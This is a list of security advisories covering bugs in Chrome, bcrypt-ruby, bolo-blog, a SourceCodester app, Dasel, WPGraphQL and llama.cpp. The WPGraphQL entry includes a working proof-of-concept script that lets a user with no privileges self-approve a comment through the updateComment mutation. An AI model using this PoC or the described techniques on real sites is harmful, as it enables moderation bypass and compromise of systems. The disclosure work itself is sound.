Vulnerabilities

Heap buffer overflow in WebGL in Google Chrome prior to 146.0.7680.165 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High)

Use after free in FedCM in Google Chrome prior to 146.0.7680.165 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Integer overflow in Fonts in Google Chrome prior to 146.0.7680.165 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High)

Use after free in WebGPU in Google Chrome prior to 146.0.7680.165 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Out of bounds read in CSS in Google Chrome prior to 146.0.7680.165 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)

Heap buffer overflow in WebAudio in Google Chrome prior to 146.0.7680.165 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High)

bcrypt-ruby is a Ruby binding for the OpenBSD bcrypt() password hashing algorithm. Prior to version 3.1.22, an integer overflow in the Java BCrypt implementation for JRuby can cause zero iterations in the strengthening loop. Impacted applications must be setting the cost to 31 to see this happen. The JRuby implementation of bcrypt-ruby (`BCrypt.java`) computes the key-strengthening round count as a signed 32-bit integer. When `cost=31` (the maximum allowed by the gem), signed integer overflow causes the round count to become negative, and the strengthening loop executes **zero iterations**. This collapses bcrypt from 2^31 rounds of exponential key-strengthening to effectively constant-time computation — only the initial EksBlowfish key setup and final 64x encryption phase remain. The resulting hash looks valid (`$2a$31$...`) and verifies correctly via `checkpw`, making the weakness invisible to the application. This issue is triggered only when cost=31 is used or when verifying a `$2a$31$` hash. This problem has been fixed in version 3.1.22. As a workaround, set the cost to something less than 31.

A security flaw has been discovered in bolo-blog 까지 2.6.4. The affected element is an unknown function of the file /console/article/ of the component Article Title Handler. Performing a manipulation of the argument articleTitle results in cross site scripting. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.

A weakness has been identified in SourceCodester Patients Waiting Area Queue Management System 1.0. The impacted element is the function ValidateToken of the file /php/api_patient_checkin.php of the component Patient Check-In Module. Executing a manipulation can lead to improper authorization. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks.

Dasel is a command-line tool and library for querying, modifying, and transforming data structures. Starting in version 3.0.0 and prior to version 3.3.1, Dasel's YAML reader allows an attacker who can supply YAML for processing to trigger extreme CPU and memory consumption. The issue is in the library's own `UnmarshalYAML` implementation, which manually resolves alias nodes by recursively following `yaml.Node.Alias` pointers without any expansion budget, bypassing go-yaml v4's built-in alias expansion limit. Version 3.3.2 contains a patch for the issue.

WPGraphQL provides a GraphQL API for WordPress sites. Prior to version 2.10.0, an authorization flaw in updateComment allows an authenticated low-privileged user (including a custom role with zero capabilities) to change moderation status of their own comment (for example to APPROVE) without the moderate_comments capability. This can bypass moderation workflows and let untrusted users self-approve content. Version 2.10.0 contains a patch.<br /> <br /> ### Details<br /> <br /> In WPGraphQL 2.9.1 (tested), authorization for updateComment is owner-based, not field-based:<br /> <br /> - plugins/wp-graphql/src/Mutation/CommentUpdate.php:92 allows moderators.<br /> - plugins/wp-graphql/src/Mutation/CommentUpdate.php:99:99 also allows the comment owner, even if they lack moderation capability.<br /> - plugins/wp-graphql/src/Data/CommentMutation.php:94:94 maps GraphQL input status directly to WordPress comment_approved.<br /> - plugins/wp-graphql/src/Mutation/CommentUpdate.php:120:120 persists that value via wp_update_comment.<br /> - plugins/wp-graphql/src/Type/Enum/CommentStatusEnum.php:22:22 exposes moderation states (APPROVE, HOLD, SPAM, TRASH).<br /> <br /> This means a non-moderator owner can submit status during update and transition moderation state.<br /> <br /> ### PoC<br /> <br /> Tested in local wp-env (Docker) with WPGraphQL 2.9.1.<br /> <br /> 1. Start environment:<br /> <br /> npm install<br /> npm run wp-env start<br /> <br /> 2. Run this PoC:<br /> <br /> ```<br /> npm run wp-env run cli -- wp eval &amp;#39;<br /> add_role("no_caps","No Caps",[]);<br /> $user_id = username_exists("poc_nocaps");<br /> if ( ! $user_id ) {<br /> $user_id = wp_create_user("poc_nocaps","Passw0rd!","poc_nocaps@example.com");<br /> }<br /> $user = get_user_by("id",$user_id);<br /> $user-&gt;set_role("no_caps");<br /> <br /> $post_id = wp_insert_post([<br /> "post_title" =&gt; "PoC post",<br /> "post_status" =&gt; "publish",<br /> "post_type" =&gt; "post",<br /> "comment_status" =&gt; "open",<br /> ]);<br /> <br /> $comment_id = wp_insert_comment([<br /> "comment_post_ID" =&gt; $post_id,<br /> "comment_content" =&gt; "pending comment",<br /> "user_id" =&gt; $user_id,<br /> "comment_author" =&gt; $user-&gt;display_name,<br /> "comment_author_email" =&gt; $user-&gt;user_email,<br /> "comment_approved" =&gt; "0",<br /> ]);<br /> <br /> wp_set_current_user($user_id);<br /> <br /> $result = graphql([<br /> "query" =&gt; "mutation U(\$id:ID!){ updateComment(input:{id:\$id,status:APPROVE}){ success comment{ databaseId status } } }",<br /> "variables" =&gt; [ "id" =&gt; (string)$comment_id ],<br /> ]);<br /> <br /> echo wp_json_encode([<br /> "role_caps" =&gt; array_keys(array_filter((array)$user-&gt;allcaps)),<br /> "status" =&gt; $result["data"]["updateComment"]["comment"]["status"] ?? null,<br /> "db_comment_approved" =&gt; get_comment($comment_id)-&gt;comment_approved ?? null,<br /> "comment_id" =&gt; $comment_id<br /> ]);<br /> &amp;#39;<br /> ```<br /> <br /> 3. Observe result:<br /> <br /> - role_caps is empty (or no moderate_comments)<br /> - mutation returns status: APPROVE<br /> - DB value becomes comment_approved = 1<br /> <br /> ### Impact<br /> <br /> This is an authorization bypass / broken access control issue in comment moderation state transitions. Any deployment using WPGraphQL comment mutations where low-privileged users can make comments is impacted. Moderation policy can be bypassed by self-approving content.

llama.cpp is an inference of several LLM models in C/C++. Prior to b7824, an integer overflow vulnerability in the `ggml_nbytes` function allows an attacker to bypass memory validation by crafting a GGUF file with specific tensor dimensions. This causes `ggml_nbytes` to return a significantly smaller size than required (e.g., 4MB instead of Exabytes), leading to a heap-based buffer overflow when the application subsequently processes the tensor. This vulnerability allows potential Remote Code Execution (RCE) via memory corruption. b7824 contains a fix.